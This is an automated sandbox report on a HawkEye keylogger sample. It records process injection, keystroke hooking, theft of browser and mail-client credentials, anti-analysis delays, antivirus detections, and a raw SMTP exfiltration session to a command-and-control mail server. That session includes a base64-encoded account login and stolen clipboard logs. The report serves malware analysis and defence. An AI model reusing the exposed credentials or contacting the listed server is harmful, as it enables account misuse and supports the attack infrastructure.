paladin316

Exes_b0344c3414f8b69a1521bbf9b2f8dc03_exe_2019-07-22_15_30.txt

Jul 22nd, 2019
  1.  
  2. * MalFamily: "Hawkeye"
  3.  
  4. * MalScore: 10.0
  5.  
  6. * File Name: "Exes_b0344c3414f8b69a1521bbf9b2f8dc03.exe"
  7. * File Size: 1966080
  8. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. * SHA256: "8809285aa66e339412f6b4d85eee558726ffe6fedf7e203e4a87f14051a1b83d"
  10. * MD5: "b0344c3414f8b69a1521bbf9b2f8dc03"
  11. * SHA1: "4d87bf9b8eedc5b30da17857d5f331f0cac4c41a"
  12. * SHA512: "0c2ce03461b8852fea7fece0fd15438403b0d0fb699e0ccbe3d22323f400be79ce387dd24be8d8831a9158cdfd26e8e8b1266eff616cbed32429a33892a291e2"
  13. * CRC32: "3B25A673"
  14. * SSDEEP: "49152:Ph+ZkldoPK8YaGsSYmB/s38eAIJ00enVtU5PBV:Y2cPK8EYmB/CknED"
  15.  
  16. * Process Execution:
  17. "Exes_b0344c3414f8b69a1521bbf9b2f8dc03.exe",
  18. "RegAsm.exe",
  19. "vbc.exe",
  20. "vbc.exe",
  21. "vbc.exe",
  22. "vbc.exe",
  23. "vbc.exe",
  24. "services.exe",
  25. "svchost.exe",
  26. "WmiPrvSE.exe",
  27. "WmiPrvSE.exe",
  28. "lsass.exe",
  29. "taskhost.exe",
  30. "lsass.exe",
  31. "WMIADAP.exe"
  32.  
  33.  
  34. * Executed Commands:
  35. "\"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe\" /stext \"C:\\Users\\user\\AppData\\Local\\Temp\\tmpBC21.tmp\"",
  36. "\"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe\" /stext \"C:\\Users\\user\\AppData\\Local\\Temp\\tmpEB1D.tmp\"",
  37. "\"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe\" /stext \"C:\\Users\\user\\AppData\\Local\\Temp\\tmpE59B.tmp\"",
  38. "\"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe\" /stext \"C:\\Users\\user\\AppData\\Local\\Temp\\tmpFE01.tmp\"",
  39. "\"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe\" /stext \"C:\\Users\\user\\AppData\\Local\\Temp\\tmpF524.tmp\"",
  40. "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
  41. "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding",
  42. "C:\\Windows\\system32\\lsass.exe"
  43.  
  44.  
  45. * Signatures Detected:
  46.  
  47. "Description": "Creates RWX memory",
  48. "Details":
  49.  
  50.  
  51. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  52. "Details":
  53.  
  54. "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
  55.  
  56.  
  57. "suspicious_request": "http://bot.whatismyipaddress.com/"
  58.  
  59.  
  60.  
  61.  
  62. "Description": "Performs some HTTP requests",
  63. "Details":
  64.  
  65. "url": "http://bot.whatismyipaddress.com/"
  66.  
  67.  
  68.  
  69.  
  70. "Description": "The binary likely contains encrypted or compressed data.",
  71. "Details":
  72.  
  73. "section": "name: .rsrc, entropy: 7.98, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ, raw_size: 0x00115a00, virtual_size: 0x00115988"
  74.  
  75.  
  76.  
  77.  
  78. "Description": "Looks up the external IP address",
  79. "Details":
  80.  
  81. "domain": "bot.whatismyipaddress.com"
  82.  
  83.  
  84.  
  85.  
  86. "Description": "Executed a process and injected code into it, probably while unpacking",
  87. "Details":
  88.  
  89. "Injection": "Exes_b0344c3414f8b69a1521bbf9b2f8dc03.exe(1840) -> RegAsm.exe(2936)"
  90.  
  91.  
  92.  
  93.  
  94. "Description": "Sniffs keystrokes",
  95. "Details":
  96.  
  97. "SetWindowsHookExA": "Process: RegAsm.exe(2936)"
  98.  
  99.  
  100.  
  101.  
  102. "Description": "A process attempted to delay the analysis task by a long amount of time.",
  103. "Details":
  104.  
  105. "Process": "RegAsm.exe tried to sleep 2607 seconds, actually delayed analysis time by 0 seconds"
  106.  
  107.  
  108.  
  109.  
  110. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  111. "Details":
  112.  
  113. "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 15051955 times"
  114.  
  115.  
  116.  
  117.  
  118. "Description": "Exhibits behavior characteristics of HawkEye keylogger.",
  119. "Details":
  120.  
  121. "Host": "192.185.113.100:587"
  122.  
  123.  
  124. "Hostname": "mail.renowncontainerlines.com"
  125.  
  126.  
  127. "SMTP_Auth_Email": "shobha@renowncontainerlines.com"
  128.  
  129.  
  130. "SMTP_Mail_From": "<shobha@renowncontainerlines.com>"
  131.  
  132.  
  133. "SMTP_Send_To": "<shobha@renowncontainerlines.com>"
  134.  
  135.  
  136.  
  137.  
  138. "Description": "Steals private information from local Internet browsers",
  139. "Details":
  140.  
  141. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
  142.  
  143.  
  144. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  145.  
  146.  
  147. "file": "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat"
  148.  
  149.  
  150.  
  151.  
  152. "Description": "Exhibits behavior characteristic of iSpy Keylogger",
  153. "Details":
  154.  
  155. "C2": "192.185.113.100"
  156.  
  157.  
  158. "C2": "mail.renowncontainerlines.com"
  159.  
  160.  
  161.  
  162.  
  163. "Description": "File has been identified by 29 Antiviruses on VirusTotal as malicious",
  164. "Details":
  165.  
  166. "MicroWorld-eScan": "Trojan.Agent.EATP"
  167.  
  168.  
  169. "FireEye": "Generic.mg.b0344c3414f8b69a"
  170.  
  171.  
  172. "Cylance": "Unsafe"
  173.  
  174.  
  175. "Arcabit": "Trojan.Agent.EATP"
  176.  
  177.  
  178. "Invincea": "heuristic"
  179.  
  180.  
  181. "F-Prot": "W32/AutoIt.IJ.gen!Eldorado"
  182.  
  183.  
  184. "Symantec": "ML.Attribute.HighConfidence"
  185.  
  186.  
  187. "APEX": "Malicious"
  188.  
  189.  
  190. "Kaspersky": "UDS:DangerousObject.Multi.Generic"
  191.  
  192.  
  193. "BitDefender": "Trojan.Agent.EATP"
  194.  
  195.  
  196. "Tencent": "Win32.Trojan.Inject.Auto"
  197.  
  198.  
  199. "Endgame": "malicious (high confidence)"
  200.  
  201.  
  202. "McAfee-GW-Edition": "BehavesLike.Win32.Generic.tc"
  203.  
  204.  
  205. "Emsisoft": "Trojan.Agent.EATP (B)"
  206.  
  207.  
  208. "SentinelOne": "DFI - Suspicious PE"
  209.  
  210.  
  211. "Cyren": "W32/AutoIt.IJ.gen!Eldorado"
  212.  
  213.  
  214. "MAX": "malware (ai score=83)"
  215.  
  216.  
  217. "Antiy-AVL": "Trojan/Generic.ASVCS3S.1E5"
  218.  
  219.  
  220. "Microsoft": "Trojan:Win32/Wacatac.B!ml"
  221.  
  222.  
  223. "ZoneAlarm": "UDS:DangerousObject.Multi.Generic"
  224.  
  225.  
  226. "GData": "Trojan.Agent.EATP (2x)"
  227.  
  228.  
  229. "AhnLab-V3": "Malware/Win32.RL_Trojan.R280776"
  230.  
  231.  
  232. "Acronis": "suspicious"
  233.  
  234.  
  235. "ALYac": "Trojan.Agent.EATP"
  236.  
  237.  
  238. "Ad-Aware": "Trojan.Agent.EATP"
  239.  
  240.  
  241. "ESET-NOD32": "a variant of Win32/Injector.Autoit.EDR"
  242.  
  243.  
  244. "Rising": "Trojan.Win32.Agent_.sa (CLASSIC)"
  245.  
  246.  
  247. "Cybereason": "malicious.b8eedc"
  248.  
  249.  
  250. "Qihoo-360": "HEUR/QVM10.1.AF9F.Malware.Gen"
  251.  
  252.  
  253.  
  254.  
  255. "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
  256. "Details":
  257.  
  258.  
  259. "Description": "Harvests information related to installed instant messenger clients",
  260. "Details":
  261.  
  262. "key": "HKEY_CURRENT_USER\\Software\\Google\\Google Talk\\Accounts"
  263.  
  264.  
  265.  
  266.  
  267. "Description": "Harvests information related to installed mail clients",
  268. "Details":
  269.  
  270. "file": "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows Live Mail\\*.oeaccount"
  271.  
  272.  
  273. "file": "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows Live Mail\\*.*"
  274.  
  275.  
  276. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles"
  277.  
  278.  
  279. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046"
  280.  
  281.  
  282. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326"
  283.  
  284.  
  285. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\IMAP User"
  286.  
  287.  
  288. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259"
  289.  
  290.  
  291. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
  292.  
  293.  
  294. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
  295.  
  296.  
  297. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\SMTP User"
  298.  
  299.  
  300. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff"
  301.  
  302.  
  303. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2"
  304.  
  305.  
  306. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670"
  307.  
  308.  
  309. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e"
  310.  
  311.  
  312. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
  313.  
  314.  
  315. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\IMAP User"
  316.  
  317.  
  318. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046"
  319.  
  320.  
  321. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7"
  322.  
  323.  
  324. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\HTTP User"
  325.  
  326.  
  327. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001"
  328.  
  329.  
  330. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\SMTP User"
  331.  
  332.  
  333. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook"
  334.  
  335.  
  336. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\POP3 User"
  337.  
  338.  
  339. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\POP3 User"
  340.  
  341.  
  342. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604"
  343.  
  344.  
  345. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1"
  346.  
  347.  
  348. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a"
  349.  
  350.  
  351. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\HTTP User"
  352.  
  353.  
  354. "key": "HKEY_CURRENT_USER\\Identities\\0A258175-2D14-4D69-9955-E200F247250F\\Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts"
  355.  
  356.  
  357. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts"
  358.  
  359.  
  360. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Account Manager\\Accounts"
  361.  
  362.  
  363. "key": "HKEY_CURRENT_USER\\Identities\\0A258175-2D14-4D69-9955-E200F247250F\\Software\\Microsoft\\Internet Account Manager\\Accounts"
  364.  
  365.  
  366.  
  367.  
  368. "Description": "Makes SMTP requests, possibly sending spam or exfiltrating data.",
  369. "Details":
  370.  
  371. "SMTP": "192.185.113.100 (mail.renowncontainerlines.com)"
  372.  
  373.  
  374.  
  375.  
  376. "Description": "Anomalous binary characteristics",
  377. "Details":
  378.  
  379. "anomaly": "Actual checksum does not match that reported in PE header"
  380.  
  381.  
  382.  
  383.  
  384. "Description": "Created network traffic indicative of malicious activity",
  385. "Details":
  386.  
  387. "signature": "ET TROJAN Hawkeye Keylogger SMTP Beacon"
  388.  
  389.  
  390.  
  391.  
  392.  
  393. * Started Service:
  394. "VaultSvc"
  395.  
  396.  
  397. * Mutexes:
  398. "Global\\CLR_CASOFF_MUTEX",
  399. "a0afcf2e-81ce-4efb-9585-0bb9e57c9fab",
  400. "Global\\.net clr networking",
  401. "CicLoadWinStaWinSta0",
  402. "Local\\MSCTF.CtfMonitorInstMutexDefault1",
  403. "Global\\ADAP_WMI_ENTRY",
  404. "Global\\RefreshRA_Mutex",
  405. "Global\\RefreshRA_Mutex_Lib",
  406. "Global\\RefreshRA_Mutex_Flag"
  407.  
  408.  
  409. * Modified Files:
  410. "C:\\Users\\user\\AppData\\Local\\Temp\\e7595cac-762a-e381-a64b-a9c703513bf3",
  411. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
  412. "\\??\\WMIDataDevice",
  413. "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data",
  414. "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data",
  415. "C:\\Users\\user\\AppData\\Local\\Temp\\tmpBC21.tmp",
  416. "C:\\Windows\\sysnative\\LogFiles\\Scm\\5869f1c1-01d7-41f7-84b7-715672259fa8",
  417. "C:\\Users\\user\\AppData\\Local\\Temp\\tmpEB1D.tmp",
  418. "C:\\Users\\user\\AppData\\Local\\Temp\\tmpE59B.tmp",
  419. "C:\\Users\\user\\AppData\\Local\\Temp\\tmpFE01.tmp",
  420. "C:\\Windows\\sysnative\\wbem\\Performance\\WmiApRpl_new.h",
  421. "C:\\Users\\user\\AppData\\Local\\Temp\\tmpF524.tmp"
  422.  
  423.  
  424. * Deleted Files:
  425. "C:\\Users\\user\\AppData\\Local\\Temp\\tmpBC21.tmp",
  426. "C:\\Users\\user\\AppData\\Local\\Temp\\tmpEB1D.tmp",
  427. "C:\\Users\\user\\AppData\\Local\\Temp\\tmpE59B.tmp",
  428. "C:\\Users\\user\\AppData\\Local\\Temp\\tmpFE01.tmp"
  429.  
  430.  
  431. * Modified Registry Keys:
  432. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Tracing\\RegAsm_RASAPI32",
  433. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\RegAsm_RASAPI32\\EnableFileTracing",
  434. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\RegAsm_RASAPI32\\EnableConsoleTracing",
  435. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\RegAsm_RASAPI32\\FileTracingMask",
  436. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\RegAsm_RASAPI32\\ConsoleTracingMask",
  437. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\RegAsm_RASAPI32\\MaxFileSize",
  438. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\RegAsm_RASAPI32\\FileDirectory",
  439. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\VaultSvc\\Type",
  440. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
  441. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\IDE\\DiskVBOX_HARDDISK___________________________1.0_____\\5&33d1638a&0&0.0.0_0-00000000-0000-0000-0000-000000000000",
  442. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\advapi32.dllMofResourceName",
  443. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\en-US\\advapi32.dll.muiMofResourceName",
  444. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\drivers\\ACPI.sysACPIMOFResource",
  445. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\drivers\\en-US\\ACPI.sys.muiACPIMOFResource",
  446. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\drivers\\ndis.sysMofResourceName",
  447. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\drivers\\en-US\\ndis.sys.muiMofResourceName",
  448. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\mssmbios.sysMofResource",
  449. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\en-US\\mssmbios.sys.muiMofResource",
  450. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\HDAudBus.sysHDAudioMofName",
  451. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\en-US\\HDAudBus.sys.muiHDAudioMofName",
  452. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\intelppm.sysPROCESSORWMI",
  453. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\en-US\\intelppm.sys.muiPROCESSORWMI",
  454. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\System32\\Drivers\\portcls.SYSPortclsMof",
  455. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\System32\\Drivers\\en-US\\portcls.SYS.muiPortclsMof",
  456. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\monitor.sysMonitorWMI"
  457.  
  458.  
  459. * Deleted Registry Keys:
  460. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\monitor.sysMonitorWMI"
  461.  
  462.  
  463. * DNS Communications:
  464.  
  465. "type": "A",
  466. "request": "bot.whatismyipaddress.com",
  467. "answers":
  468.  
  469. "data": "66.171.248.178",
  470. "type": "A"
  471.  
  472.  
  473.  
  474.  
  475. "type": "A",
  476. "request": "mail.renowncontainerlines.com",
  477. "answers":
  478.  
  479. "data": "192.185.113.100",
  480. "type": "A"
  481.  
  482.  
  483.  
  484.  
  485.  
  486. * Domains:
  487.  
  488. "ip": "66.171.248.178",
  489. "domain": "bot.whatismyipaddress.com"
  490.  
  491.  
  492. "ip": "192.185.113.100",
  493. "domain": "mail.renowncontainerlines.com"
  494.  
  495.  
  496.  
  497. * Network Communication - ICMP:
  498.  
  499. * Network Communication - HTTP:
  500.  
  501. "count": 1,
  502. "body": "",
  503. "uri": "http://bot.whatismyipaddress.com/",
  504. "user-agent": "",
  505. "method": "GET",
  506. "host": "bot.whatismyipaddress.com",
  507. "version": "1.1",
  508. "path": "/",
  509. "data": "GET / HTTP/1.1\r\nHost: bot.whatismyipaddress.com\r\nConnection: Keep-Alive\r\n\r\n",
  510. "port": 80
  511.  
  512.  
  513.  
  514. * Network Communication - SMTP:
  515.  
  516. "raw": "EHLO Host\r\nAUTH login c2hvYmhhQHJlbm93bmNvbnRhaW5lcmxpbmVzLmNvbQ==\r\nc2hvYiNyZW4=\r\nMAIL FROM:<shobha@renowncontainerlines.com>\r\nRCPT TO:<shobha@renowncontainerlines.com>\r\nDATA\r\nMIME-Version: 1.0\r\nFrom: shobha@renowncontainerlines.com\r\nTo: shobha@renowncontainerlines.com\r\nDate: 22 Jul 2019 11:52:05 -0700\r\nSubject: =?utf-8?B?SGF3a0V5ZSBLZXlsb2dnZXIgLSBSZWJvcm4gdjkgLSBDbGlwYm9hcmQgTG9ncyAtIHNidSBcIFNCVVc3WDY0IC0gMTcyLjgzLjQwLjEwOQ==?=\r\nContent-Type: text/plain; charset=utf-8\r\nContent-Transfer-Encoding: base64\r\n\r\nSGF3a0V5ZSBLZXlsb2dnZXIgLSBSZWJvcm4gdjkNCkNsaXBib2FyZCBMb2dzDQpzYnUgXCBT\r\nQlVXN1g2NA0KDQoNCg0KPT09PT09PT09PT09PTExOjQwIEFNIFByb2dyYW0gTWFuYWdlcj09\r\nPT09PT09PT09PT0NCg0KYXVtYWVubmF3cmF3d3JhaXJhaGdyb3N0bWV0b2Vic21hbiBtIGVh\r\nZGRlbG5vZXd5ZW90b3RsaGljY2Jld3JvZ29zZSAgZXJnbnV5YW55ZWV0YmxoaHNzaWwgbmZo\r\nY2F0aGV1IHRiYW8gdW9scmllcnJ0b3NlZWVvZWRoaW9ocmlubXJyZmJvc2lpdHlhdHVoYWdz\r\nIHNoYSBnZGxkd3dsZWQgZXVvY2RlYWxnIHVldHJhYXJ0IGxvcmkgaWNlcCBlb3NpIGFsaGhj\r\nbmVhc3NvaW1zaG9nYXdvdSBleWFldHR0b3l0cnMgd3VlcmJlc2FpaWVuZG1zaGRvcnJpc2Rl\r\nY3dydXRuZWR0ZW9kaHJudGF0aHQgaXl3ZW9pIGVhIGN0dGVjb255Ymlnb3Rzd21vY2Fuc3Jp\r\nIG9lcnJoaGVkaW9vIGhlbW1ob2N0dGlveXl0YnMgbHNkZSB5Z2VhZW5sYWV1ZXNydW5lb3Ju\r\ndHBpbWVuY3RpcnMgZnRocmxpZHdvZW9kaGRmdHIgZmhtdWFoIGl0bG5vYWllb2hpb2hlaWV0\r\nZWZnIGVvcGVtZCByc3dmcmVhYXRhYmhhZWVzaG9jYWVoZWVoIGF0c29zb2kgbyB5ZWRzdGZl\r\nIGFodWMgZWllZGVlb2NuZWJjaWNhc2YgIGVhYXR1aGhlbmVkb3VzbHRpYW9kdHRyZWFzdWQg\r\ndGxyb2lpb253c2RtYnMgbml3bnRhaGVuZG5jIG9pZWVlYXRvZXV0ZWMgcGlzbmlhaW9ldWFt\r\nb2hvZXVtICBhbW5ldWV0aG9zdG5ycyBvaG9udHRlYnJhYWVvZ2xtZHRpZW9ueW9y\r\n\r\n.\r\n",
  517. "dst": "192.185.113.100"
  518.  
  519.  
  520.  
  521. * Network Communication - Hosts:
  522.  
  523. * Network Communication - IRC: